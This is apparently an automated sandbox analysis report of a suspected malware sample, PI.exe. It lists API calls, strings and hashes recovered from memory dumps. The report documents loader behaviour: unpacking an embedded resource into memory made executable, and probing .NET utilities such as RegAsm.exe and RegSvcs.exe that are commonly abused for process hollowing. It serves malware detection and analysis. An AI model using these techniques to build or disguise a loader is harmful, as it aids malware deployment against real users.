Opcode ID: 924fafae001f546e37830360374a409be916a211ac3fc3b1f3fd902357a80b36
Instruction ID: 52813020f01a00302e1088a0783c1031ea7485578fde20afaf04ca9eb3fabe85
Opcode Fuzzy Hash: 924fafae001f546e37830360374a409be916a211ac3fc3b1f3fd902357a80b36
Instruction Fuzzy Hash: 44018B35600340DFDB22CF4AD885B25FFA5EF08724F08849ADE894BA56D375E518DB72

Uniqueness

Uniqueness Score: -1.00%

Function 02332478, Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

3, xrefs: 02332510

Memory Dump Source

Source File: 00000002.00000002.942529306.0000000002332000.00000040.00000001.sdmp, Offset: 02332000, based on PE: false

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: abdf420d464e6db3f634b6d81ad99e16add2d9effc947cab5009b4d10c52f928
Instruction ID: ed1282d5f14ab2d127dfb6d716889c20f649c6805a698bcc6481493634b7b7c6
Opcode Fuzzy Hash: abdf420d464e6db3f634b6d81ad99e16add2d9effc947cab5009b4d10c52f928
Instruction Fuzzy Hash: 0891E17691D3C19FE7138B389875792BFB0AF47724B4941CAD8808F0E3D2559E86C761

Uniqueness

Uniqueness Score: -1.00%

Function 0046D4F3, Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046D599
LoadLibraryW.KERNEL32(?), ref: 0046D5F1
LoadLibraryW.KERNEL32(004702D4), ref: 0046D5FA

Strings

iphlpapi.dll, xrefs: 0046D52E
mscorjit.dll, xrefs: 0046D56D
mscorrc.dll, xrefs: 0046D574
Gdiplus.dll, xrefs: 0046D53C
Culture.dll, xrefs: 0046D566
mscordacwks.dll, xrefs: 0046D55F
mscorsec.dll, xrefs: 0046D558
ole32.dll, xrefs: 0046D543
mscoree.dll, xrefs: 0046D551
user32.dll, xrefs: 0046D527
mscorwks.dll, xrefs: 0046D512
shfolder.dll, xrefs: 0046D520
sxs.dll, xrefs: 0046D519
advapi32.dll, xrefs: 0046D535
diasymreader.dll, xrefs: 0046D54A

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: LibraryLoad$_memset
String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
API String ID: 240438931-1803115895
Opcode ID: 2ba7afeb3c200f32fababa7d663a030cb06bcaa20673260e90cae7c7f07f9841
Instruction ID: 3655f4d122f5bc05d1f16e39217557b51ec404a71cc2434e349ef13571c48a43
Opcode Fuzzy Hash: 2ba7afeb3c200f32fababa7d663a030cb06bcaa20673260e90cae7c7f07f9841
Instruction Fuzzy Hash: E9314DB1D02219EBCF10DF98D9485EEB7B4EF45309F10C55AE50ABB200E7B49A49CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0046E7C7, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 187memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0046E039: GetModuleHandleW.KERNEL32(00000000), ref: 0046E042
Part of subcall function 0046E039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 0046E056
Part of subcall function 0046E039: SizeofResource.KERNEL32(00000000,00000000), ref: 0046E064
Part of subcall function 0046E039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0046E07B
Part of subcall function 0046E039: LoadResource.KERNEL32(00000000,00000000), ref: 0046E085

Part of subcall function 0046DED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0046DF04

GetModuleHandleA.KERNEL32(00000000), ref: 0046E848
VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 0046E868

Part of subcall function 0046DF82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0046DFAD

_memset.LIBCMT ref: 0046E89F

Part of subcall function 0046D834: _memset.LIBCMT ref: 0046D869

_memset.LIBCMT ref: 0046E8F7
PathFileExistsW.SHLWAPI(?), ref: 0046E919
_memset.LIBCMT ref: 0046E945
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0046E97B
GetFileSize.KERNEL32(00000000,00000000), ref: 0046E99D
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PI.exe,00000104), ref: 0046E9DA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PI.exe,00000104), ref: 0046E9E7
CloseHandle.KERNEL32 ref: 0046EA54

Strings

@G, xrefs: 0046E825
C:\Users\user\Desktop\PI.exe, xrefs: 0046E9E1
C:\Users\user\Desktop\PI.exe, xrefs: 0046E9CF

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
String ID: @G$C:\Users\user\Desktop\PI.exe$C:\Users\user\Desktop\PI.exe
API String ID: 3419322617-4282197175
Opcode ID: c84251608ba7cb7c650e29245484546982c39964b9647baf65cc15b653153b76
Instruction ID: 54573f5839cb6bb57c1ee38be5fb16f243e05aea90516f5717f9c815d5723806
Opcode Fuzzy Hash: c84251608ba7cb7c650e29245484546982c39964b9647baf65cc15b653153b76
Instruction Fuzzy Hash: E8617375A00158EFCF20AFA6EC85AAA37E9FB04305F04147BE109D2251F7785E84CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0046DB12, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 165fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0046DB32
_memset.LIBCMT ref: 0046DB98

Strings

WINTRUST.dll, xrefs: 0046DBAF
clr.dll, xrefs: 0046DC25
mscoree.dll, xrefs: 0046DBEA
mscorwks.dll, xrefs: 0046DC93
C:\Users\user\Desktop\PI.exe, xrefs: 0046DB4E
mscoreei.dll, xrefs: 0046DC5C

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: CreateFile_memset
String ID: C:\Users\user\Desktop\PI.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
API String ID: 3830271748-3501435816
Opcode ID: 2b7bf1afc1096152a2ebfcd2f19cd51e7ec24f0b592a4fa09bb36206363fc79e
Instruction ID: 2fa02777e8d76f7ebfdfbb2ef151216759ac9713a4107edf3a31953f2c23c173
Opcode Fuzzy Hash: 2b7bf1afc1096152a2ebfcd2f19cd51e7ec24f0b592a4fa09bb36206363fc79e
Instruction Fuzzy Hash: DE51D252F1011A86CB20AF24CC01EF73262EF34F94B8546A6D945CB358F76BDD82C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0046D6F4, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0046D71D
_memset.LIBCMT ref: 0046D744
RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0046D76D
_memset.LIBCMT ref: 0046D78B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00474000,000000FF,?,00000104), ref: 0046D7A9
RegCloseKey.KERNEL32(00000000), ref: 0046D829

Strings

InstallRoot, xrefs: 0046D75D
Software\Microsoft\.NETFramework, xrefs: 0046D70D

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
String ID: InstallRoot$Software\Microsoft\.NETFramework
API String ID: 3047945766-4217373442
Opcode ID: 328732c845c7fcc4e69464a29c333ea45ef30942c0fdcc470717a3ce8d8b0bc4
Instruction ID: 380d144ed0fd66be5c3ea936ac93ef3ecd6bb4704367f87e86c5fbbc90f89f6e
Opcode Fuzzy Hash: 328732c845c7fcc4e69464a29c333ea45ef30942c0fdcc470717a3ce8d8b0bc4
Instruction Fuzzy Hash: 8B31B072E00219ABCB209B959C49BEFB6B8EF48714F1041A7F909E3251F7B44A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046D60E, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046D660
PathFileExistsW.SHLWAPI(?), ref: 0046D6B8

Strings

RegAsm.exe, xrefs: 0046D62E
jsc.exe, xrefs: 0046D627
CasPol.exe, xrefs: 0046D63C
dfsvc.exe, xrefs: 0046D635
RegSvcs.exe, xrefs: 0046D643

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ExistsFilePath_memset
String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
API String ID: 4214796376-2149642370
Opcode ID: fd662dde60a8db192ecba799f1331b151782ab31a5fbd3ee15d20f7497fa64ee
Instruction ID: 5ca88b02cba232ca5a30a2c891f7614429961287ac268fab35b2a70b6ae8037d
Opcode Fuzzy Hash: fd662dde60a8db192ecba799f1331b151782ab31a5fbd3ee15d20f7497fa64ee
Instruction Fuzzy Hash: 85218371E0020AEBCF10DFA8D8946EE77B8FF45349F0085A6E84AD7201F7749E459B99

Uniqueness

Uniqueness Score: -1.00%

Function 004D7463, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

Xm, xrefs: 004D7450

Memory Dump Source

Source File: 00000002.00000002.941913625.00000000004D6000.00000040.00000001.sdmp, Offset: 004D6000, based on PE: false

Similarity

API ID:
String ID: Xm
API String ID: 0-1247191652
Opcode ID: affb4f4e8747bd8086df427d8f9a0f85a4e67ba5967772378d41fdfce1e9099e
Instruction ID: ffda240b4f68570cbdefdc7eb00640184602b1afc06f07a4fd940234598259ff
Opcode Fuzzy Hash: affb4f4e8747bd8086df427d8f9a0f85a4e67ba5967772378d41fdfce1e9099e
Instruction Fuzzy Hash: 57713A7194D7526FC7218E78ECF06A17BA0EB02324728076FD9E28B7D2F7585806875A

Uniqueness

Uniqueness Score: -1.00%

Function 0046E1BE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E1FD

Part of subcall function 0046D89E: GetCurrentProcess.KERNEL32 ref: 0046D8AB
Part of subcall function 0046D89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0046D8C5
Part of subcall function 0046D89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D8FD
Part of subcall function 0046D89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D929

Strings

clr.dll, xrefs: 0046E28F
mscoree.dll, xrefs: 0046E2FF
CRYPT32.dll, xrefs: 0046E253
imagehlp.dll, xrefs: 0046E216
mscoreei.dll, xrefs: 0046E2C7

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
API String ID: 1620000358-1444991907
Opcode ID: 27f3e555e10084db3ef0e767e8c1b5cf52b2be683a322ad4de06f4bee9a7d945
Instruction ID: 03cab728d020f53b19918b172264a8a4f17f456f30ba7373bb8a28b62ced5a8c
Opcode Fuzzy Hash: 27f3e555e10084db3ef0e767e8c1b5cf52b2be683a322ad4de06f4bee9a7d945
Instruction Fuzzy Hash: 6541CA1961021285CB20AF36CC55AF732EB9F30B64B8446E6DC55C7399F727CDC1C25A

Uniqueness

Uniqueness Score: -1.00%

Function 0046DD94, Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0046DD9D

Part of subcall function 0046704F: __FF_MSGBANNER.LIBCMT ref: 00467072
Part of subcall function 0046704F: __NMSG_WRITE.LIBCMT ref: 00467079
Part of subcall function 0046704F: RtlAllocateHeap.NTDLL(00000000,?), ref: 004670C6

VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 0046DDB4
VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0046DDC2
_memset.LIBCMT ref: 0046DE03
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0046DE14
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0046DE1C
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0046DE23

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
String ID:
API String ID: 851286602-0
Opcode ID: 411a69e42f7367610b1b24f7b00a8a8591e0e65ee848771f9e8f0090f6ca19f5
Instruction ID: 9adb044ba4418f2d4daf0815aff79672ef465e591c0fcc059fd35d3a6ec4a088
Opcode Fuzzy Hash: 411a69e42f7367610b1b24f7b00a8a8591e0e65ee848771f9e8f0090f6ca19f5
Instruction Fuzzy Hash: 88219872900205EFC710CFB5DD89DAA7BBCEB45341B01417BF649C6192E774D604CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046E039, Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0046E042
FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 0046E056
SizeofResource.KERNEL32(00000000,00000000), ref: 0046E064
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0046E07B
LoadResource.KERNEL32(00000000,00000000), ref: 0046E085
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0046E0AC

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
String ID:
API String ID: 3588284000-0
Opcode ID: 6fc83a231605d9af7d31a756637c874a306b6b477db7287aeb27a2f137dbfa33
Instruction ID: 90fc874073c84720e4bfcce3ac6d007210172e5194cbaa35dcbeb2ea00de9b77
Opcode Fuzzy Hash: 6fc83a231605d9af7d31a756637c874a306b6b477db7287aeb27a2f137dbfa33
Instruction Fuzzy Hash: A401A2797407117BE2322BA66C49F2B36ACAB45B45F140031FB01E62C1FAE5CD05567B

Uniqueness

Uniqueness Score: -1.00%

Function 0046E3B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E3D2

Part of subcall function 0046D89E: GetCurrentProcess.KERNEL32 ref: 0046D8AB
Part of subcall function 0046D89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0046D8C5
Part of subcall function 0046D89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D8FD
Part of subcall function 0046D89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D929

LoadLibraryExW.KERNEL32(?,?,?), ref: 0046E3F2
StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 0046E402

Part of subcall function 0046E0F0: CloseHandle.KERNEL32 ref: 0046E0FA

Strings

\system.ni.dll, xrefs: 0046E3F8

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
String ID: \system.ni.dll
API String ID: 2189784845-482435895
Opcode ID: a1f0295fa817915df791d05a91ceed4717e9a6c3d4e231a649de29c55e48224a
Instruction ID: c9cc71b8bc33404fc9f8721cf16ef4859fbc0cc4e56bc8438fb718ba1dc0e3be
Opcode Fuzzy Hash: a1f0295fa817915df791d05a91ceed4717e9a6c3d4e231a649de29c55e48224a
Instruction Fuzzy Hash: 71F08935900218FBCF11AF75CC09EDB3BACAF04345F004075BD55D6162FA35CA609B99

Uniqueness

Uniqueness Score: -1.00%

Function 0046D89E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0046D8AB
EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0046D8C5
GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D8FD
GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D929

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
String ID:
API String ID: 3431743260-0
Opcode ID: bfb91ff05c6d4b837f91a4dec34d07737a460846f1b712bee3fc9fec6642e001
Instruction ID: 93c7c41091d194705d68aa11c8f7c488f196196ca1be0d3c551e3b1c3663ca2f
Opcode Fuzzy Hash: bfb91ff05c6d4b837f91a4dec34d07737a460846f1b712bee3fc9fec6642e001
Instruction Fuzzy Hash: 9821A571F4020AABDF10EF94C981AEFB7B9EF04344F104066E551E2150FB749E5ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 0046D46C, Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0046D493
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0046D4BA
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0046D4C0
FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0046D4C7

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 4115577372-0
Opcode ID: cb6844ff9f7245cdc98af813ce3fb05c612b6eba9976165da3156f72b172a388
Instruction ID: eb8fc1bcaf48843073f82bb212e04b7d9a9b4980ebe9f6db28d2db61452ff4e3
Opcode Fuzzy Hash: cb6844ff9f7245cdc98af813ce3fb05c612b6eba9976165da3156f72b172a388
Instruction Fuzzy Hash: BCF0ADB6900209FBCF105FA4CD88A9A7E6CEB04350F004225FA0991151EB74EA14CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0046DE5D, Relevance: 4.6, APIs: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0046DE71
LoadLibraryA.KERNEL32 ref: 0046DE7F
GetProcAddress.KERNEL32(?,?), ref: 0046DEAF

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: f75a3da619f40fa57a1c0b54a6b15af85333fdfc899a7924de558d8ad8927c49
Instruction ID: d35db3b8645bc77b796fbdde51a496902602e998a88f468d068486d9dea793c8
Opcode Fuzzy Hash: f75a3da619f40fa57a1c0b54a6b15af85333fdfc899a7924de558d8ad8927c49
Instruction Fuzzy Hash: C3112AB1F00A16ABDB20CF55DC809AB77F8AF1475471100BAE901EB212F735EE05CA96

Uniqueness

Uniqueness Score: -1.00%

Function 00468BD8, Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004671FB), ref: 00468BDB
__malloc_crt.LIBCMT ref: 00468C09
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00468C16

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 6d84d70df08ffdd3d5dc7dcc79cfbf2414ef9cd56cc822d30d44c86ee583b79f
Instruction ID: 9cb532d98a6eac70bf190ae5cc7352172a95187302fd6f9b73887c725288fdf9
Opcode Fuzzy Hash: 6d84d70df08ffdd3d5dc7dcc79cfbf2414ef9cd56cc822d30d44c86ee583b79f
Instruction Fuzzy Hash: 3DF0E2775051206ECA207A357C48477176CDBCA369316453FF493C3202FE684C8282BB

Uniqueness

Uniqueness Score: -1.00%

Function 0046E34A, Relevance: 4.5, APIs: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 0046E366
LoadLibraryA.KERNEL32(?), ref: 0046E373
GetProcAddress.KERNEL32(00000000,?), ref: 0046E381

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 3cc3f1e14616cf79dba3c41501e8749bec202a165096dad4c0e391ac62610880
Instruction ID: 68eef599676537063faa22b9711d9c6cd8e16c24f8f15c17e91d368176d1e71f
Opcode Fuzzy Hash: 3cc3f1e14616cf79dba3c41501e8749bec202a165096dad4c0e391ac62610880
Instruction Fuzzy Hash: 99F0A43A900224EBCF116F6AEC4449F7BA5AB40B517104537FC0597215F77889D5AACA

Uniqueness

Uniqueness Score: -1.00%

Function 0046D9E9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046DA13

Part of subcall function 0046D89E: GetCurrentProcess.KERNEL32 ref: 0046D8AB
Part of subcall function 0046D89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0046D8C5
Part of subcall function 0046D89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D8FD
Part of subcall function 0046D89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0046D929

Strings

C:\Users\user\Desktop\PI.exe, xrefs: 0046DA2A

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: C:\Users\user\Desktop\PI.exe
API String ID: 1620000358-653092441
Opcode ID: 0dc2c32f53b8cc10a13f3e3db79edab013d4d4d8043411755dee122ff19768ea
Instruction ID: 44663fec2b20b8cdc3f11b69e26682e2529818c697b58643b2b5fe7617838912
Opcode Fuzzy Hash: 0dc2c32f53b8cc10a13f3e3db79edab013d4d4d8043411755dee122ff19768ea
Instruction Fuzzy Hash: AE014435D1424A9ACF11EFA8C8499AB37B9EB04304F008566F85AC7215FA74DA518B55

Uniqueness

Uniqueness Score: -1.00%

Function 0046D95F, Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,?), ref: 0046D981
VirtualProtect.KERNEL32(?,?,?,?), ref: 0046D9DE

Memory Dump Source

Source File: 00000002.00000002.941861052.0000000000467000.00000040.00000001.sdmp, Offset: 00467000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: edc950f22316088b0b29d8776c838cb4fb3f837b064a2b4ce36076bd7a8b22ff
Instruction ID: 7dc7334599d15563d47f3fcf677650b1718c6767fb62edb8fdb2a7199f888538
Opcode Fuzzy Hash: edc950f22316088b0b29d8776c838cb4fb3f837b064a2b4ce36076bd7a8b22ff
Instruction Fuzzy Hash: 571191B6E00604EFDB208F58C880BBA77B8EF45714F08416AE9459B291E334ED48DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04E34AAF, Relevance: 1.7, APIs: 1, Instructions: 219COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04E34B99

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e41e9cf0e85e5c024c761a0d39cf0b44e8a40ac9f61a98535022c61a1d6b33fd
Instruction ID: 57227a44b3c6661a2640434ca20d092e6f93e728f47d844bc360ba8d772b579a
Opcode Fuzzy Hash: e41e9cf0e85e5c024c761a0d39cf0b44e8a40ac9f61a98535022c61a1d6b33fd
Instruction Fuzzy Hash: 00A119B4E002199FCB55EF68C8586ADB7B2FB89311F1491EAD90AE3350DB346E90CF45

Uniqueness

Uniqueness Score: -1.00%

Function 04E34ADF, Relevance: 1.7, APIs: 1, Instructions: 216COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04E34B99

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7d0753ffbb355073fcbb888739e91312afd5a3b386253c103b623c276cf17e2d
Instruction ID: 9832a16364cb6f3c13053de0d7bb7fe64e1fd0a1dd4fac9cf29eeb420945074d
Opcode Fuzzy Hash: 7d0753ffbb355073fcbb888739e91312afd5a3b386253c103b623c276cf17e2d
Instruction Fuzzy Hash: 1EA10AB4E002199FCB55EF68C8586ADB7B2FB89311F1491EAD90AE3350DB346E90CF45

Uniqueness

Uniqueness Score: -1.00%

Function 059A31C8, Relevance: 1.7, APIs: 1, Instructions: 206libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A3266

Memory Dump Source

Source File: 00000002.00000002.944464184.00000000059A0000.00000040.00000001.sdmp, Offset: 059A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b97bf7ab49e12f145dfcc2b4f49017f8d5e9ed16144eee3f4ec73f17947046d
Instruction ID: 873ea3c90c86e6ffcd92e0f4f5f1924ef597cbe54358a80907a5e1e5c9f914f7
Opcode Fuzzy Hash: 9b97bf7ab49e12f145dfcc2b4f49017f8d5e9ed16144eee3f4ec73f17947046d
Instruction Fuzzy Hash: 26714B31B102059FDB05EBB8D454AAEB6F7EF88304F15992AE506DB244DF30ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E34B33, Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04E34B99

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7dbecd63ed55f91f7ef7cdef1c2273c6555cd7e6abdd6c40ace7704d3f005ceb
Instruction ID: 994690a9246ee66fb7769656589a26a9e93230e08c6c7d927956169632649cce
Opcode Fuzzy Hash: 7dbecd63ed55f91f7ef7cdef1c2273c6555cd7e6abdd6c40ace7704d3f005ceb
Instruction Fuzzy Hash: CF9119B4E002199FCB55EF68C9586ADB7B2FB89312F1491EAD50AE3350DB346E90CF41

Uniqueness

Uniqueness Score: -1.00%

Function 059A31B8, Relevance: 1.7, APIs: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059A3266

Memory Dump Source

Source File: 00000002.00000002.944464184.00000000059A0000.00000040.00000001.sdmp, Offset: 059A0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 184157ac64013465c88f87e559285af98450ce66fb16e2bf14a8d64c77c6d90c
Instruction ID: f15ca069de06d86aa9cf948129137f21314ec0c2d73c6b80304663d4b62a218e
Opcode Fuzzy Hash: 184157ac64013465c88f87e559285af98450ce66fb16e2bf14a8d64c77c6d90c
Instruction Fuzzy Hash: D5716B31B102099FDB05EB78D454AAEB7B7EF88304F15992AE506EB244DF30ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E34B7E, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04E34B99

Memory Dump Source

Source File: 00000002.00000002.944034451.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9ff20c085daa6fc42f3e84435c0331f69b0d875d767c1723f245e6896cfb96f8
Instruction ID: 2733533309e0b48684a0596aa027735f2d48e88a6f95b490f9b98338b8f14ff0
Opcode Fuzzy Hash: 9ff20c085daa6fc42f3e84435c0331f69b0d875d767c1723f245e6896cfb96f8
Instruction Fuzzy Hash: 329128B4E002199FCB55EF68C9586ADB7B2FB89312F1091AAD50AE7350DF346E90CF41

Uniqueness

Uniqueness Score: -1.00%

Function 054922C0, Relevance: 1.6, APIs: 1, Instructions: 113synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05492269

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
